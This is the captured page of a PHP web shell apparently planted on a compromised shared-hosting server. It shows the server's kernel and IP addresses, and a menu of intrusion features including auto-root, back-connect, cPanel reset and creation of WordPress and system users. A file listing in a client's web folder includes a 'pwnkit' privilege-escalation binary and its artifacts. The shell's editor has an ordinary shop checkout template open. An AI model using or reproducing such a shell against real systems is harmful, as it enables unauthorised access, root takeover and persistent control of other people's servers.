Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.116.63.107
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
Eco /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Figuresuit-order-sheet.php
36.19
KB
-rw-r--r--
bikini-bottom-style.php
7.3
KB
-rw-r--r--
bikini-custom-data.php
45.45
KB
-rw-r--r--
checkout.php
7.08
KB
-rw-r--r--
figuresuit-top-style.php
13.49
KB
-rw-r--r--
product-list.php
14.06
KB
-rw-r--r--
products-data.php
15.61
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register.php
3.97
KB
-rw-r--r--
styles-and-accessories.php
20.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : checkout.php
<?php include("includes/header.php");?> <div class="wrap-breadcrumb parallax-breadcrumb" style="background-position: 50% -20.16px;"> <div class="container"> <ul class="breadcrumb"> <li><a href="index.php"><i class="fa fa-home"></i></a></li> <li><a href="login.php">Account</a></li> <li><a href="forgot-password.php">CheckOut</a></li> </ul> </div> </div> <div class="container"> <div class="row"> <div class="col-lg-12 col-md-12 col-sm-12"> <div id="content" class="check-div"> <form action="" method="post" enctype="multipart/form-data"> <div class="table-responsive"> <table class="table table-bordered shopping-cart"> <thead> <tr> <td class="text-center">Image</td> <td class="text-left">Product Name</td> <td class="text-left">Quantity</td> <td class="text-right">Unit Price</td> <td class="text-right">Total</td> </tr> </thead> <tbody> <tr> <td class="text-center"> <a href=""><img src="https://capricathemes.com/opencart/OPC09/OPC090211/OPC2/image/cache/catalog/06-85x99.jpg" alt="" title="" class="img-thumbnail"></a> </td> <td class="text-left"><a href="">Laborum Porro Eveniet</a> <br> <small>Radio: Small</small> <br> <small>Text: testxaaaasa</small> <br> <small>Date: 2021-01-19</small> </td> <td class="text-left">Product 2</td> <td class="text-left"> <div class="input-group btn-block"> <input type="text" name="" value="" size="" class="form-control"> <span class="input-group-btn"> <button type="submit" data-toggle="tooltip" title="" class="btn btn-primary" data-original-title="Update"><i class="fa fa-refresh"></i></button> <button type="button" data-toggle="tooltip" title="" class="btn btn-danger" onclick=" " data-original-title="Remove"><i class="fa fa-times-circle"></i></button> </span> </div> </td> <td class="text-right">$109.99</td> </tr> </tbody> </table> </div> </form> <h3>What would you like to do next?</h3> <p>Choose if you have a discount code or reward points you want to use or would like to estimate your delivery cost.</p> <div class="panel-group" id="accordion"> <div class="panel panel-default"> <div class="panel-heading"> <h4 class="panel-title"> <a href="#collapse-shipping" class="accordion-toggle" data-toggle="collapse" data-parent="#accordion">Estimate Shipping & Taxes <i class="fa fa-caret-down"></i></a></h4> </div> <div id="collapse-shipping" class="panel-collapse collapse"> <div class="panel-body"> <p>Enter your destination to get a shipping estimate.</p> <div class="form-horizontal"> <div class="form-group required"> <label class="col-sm-2 control-label" for="input-postcode">Post Code</label> <div class="col-sm-10"> <input type="text" name="postcode" value="" placeholder="Post Code" id="input-postcode" class="form-control"> </div> </div> <button type="button" id="button-quote" data-loading-text="Loading..." class="btn btn-primary">Get Quotes</button> </div> </div> </div> </div> <div class="panel panel-default"> <div class="panel-heading"> <h4 class="panel-title"><a href="#collapse-voucher" data-toggle="collapse" data-parent="#accordion" class="accordion-toggle">Use Gift Certificate <i class="fa fa-caret-down"></i></a></h4> </div> <div id="collapse-voucher" class="panel-collapse collapse"> <div class="panel-body"> <label class="col-sm-2 control-label" for="input-voucher">Enter your gift certificate code here</label> <div class="input-group"> <input type="text" name="voucher" value="" placeholder="Enter your gift certificate code here" id="input-voucher" class="form-control"> <span class="input-group-btn"> <input type="submit" value="Apply Voucher" id="button-voucher" data-loading-text="Loading..." class="btn btn-primary"> </span> </div> <script type="text/javascript"><!-- $('#button-voucher').on('click', function() { $.ajax({ url: 'index.php?route=extension/total/voucher/voucher', type: 'post', data: 'voucher=' + encodeURIComponent($('input[name=\'voucher\']').val()), dataType: 'json', beforeSend: function() { $('#button-voucher').button('loading'); }, complete: function() { $('#button-voucher').button('reset'); }, success: function(json) { $('.alert-dismissible').remove(); if (json['error']) { $('.breadcrumb').after('<div class="alert alert-danger alert-dismissible"><i class="fa fa-exclamation-circle"></i> ' + json['error'] + '<button type="button" class="close" data-dismiss="alert">×</button></div>'); $('html, body').animate({ scrollTop: 0 }, 'slow'); } if (json['redirect']) { location = json['redirect']; } }, error: function(xhr, ajaxOptions, thrownError) { alert(thrownError + "\r\n" + xhr.statusText + "\r\n" + xhr.responseText); } }); }); //--> </script> </div> </div> </div> </div> <br> <div class="row"> <div class="col-sm-4 col-sm-offset-8"> <table class="table table-bordered"> <tbody> <tr> <td class="text-right"><strong>Sub-Total:</strong></td> <td class="text-right">$89.99</td> </tr> <tr> <td class="text-right"><strong>Eco Tax (-2.00):</strong></td> <td class="text-right">$2.00</td> </tr> <tr> <td class="text-right"><strong>VAT (20%):</strong></td> <td class="text-right">$18.00</td> </tr> <tr> <td class="text-right"><strong>Total:</strong></td> <td class="text-right">$109.99</td> </tr> </tbody> </table> </div> </div> <div class="buttons clearfix"> <div class="pull-left"><a href="" >Continue Shopping</a></div> <div class="pull-right"><a href="" class="btn btn-primary">Checkout</a></div> </div> </div> </div> </div> </div> <?php include("includes/footer.php");?>
Close